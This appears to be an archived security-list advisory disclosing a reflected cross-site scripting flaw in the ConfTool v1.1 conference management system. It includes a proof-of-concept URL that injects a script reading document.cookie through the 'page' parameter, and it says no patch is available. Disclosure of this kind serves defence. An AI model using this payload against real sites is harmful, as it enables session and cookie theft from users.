<<< Date Index >>>     <<< Thread Index >>>

CanfTool v1.1 Cross Site Scripting Attack



Cross Site Scripting Attack CanfTool v1.1

=========================================

Description : 

Conftool is a Web-based online system that was developed to supports many 
administrative tasks of conferences, workshops and seminars. It can help to 
make the management of events easier and much more efficient. ConfTool does not 
only support the submission/review-process, but also the registration of 
participants and many other tasks. 

Conftool is an open/shared-source system, technically mature and available 
under different licenses. 

We offer a free license of the standard version "VSIS ConfTool" for 
non-commercial conferences and events (i.e. only voluntary staff, less than 200 
participants, student discounts). Please consider our license terms for 
non-commercial events. 

In addition to this, following products and services can be purchased:

Per-conference and per-site licenses of VSIS ConfTool for organizers of small 
to medium size events. 
ConfTool Pro, an extensively enhanced version of ConfTool suitable for 
organization of larger events and offering much more features. 
Professional support for ConfTool and ConfTool Pro. 
Modifications of the software to the specific needs of your event. 
Hosting of ConfTool and ConfTool Pro.
If you are interested in any of the above, please send a mail to 
info@xxxxxxxxxxxx with some information about your event. *

============================================

WebSite : http://www.conftool.net
============================================
Vulnerable :

http://www.example.com/[path]/index.php?page=<script>alert(document.cookie)</script>

============================================

Solution :

No patch Avaible, please useing other version
=============================================

Thanks : Patriotic Hackers members

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com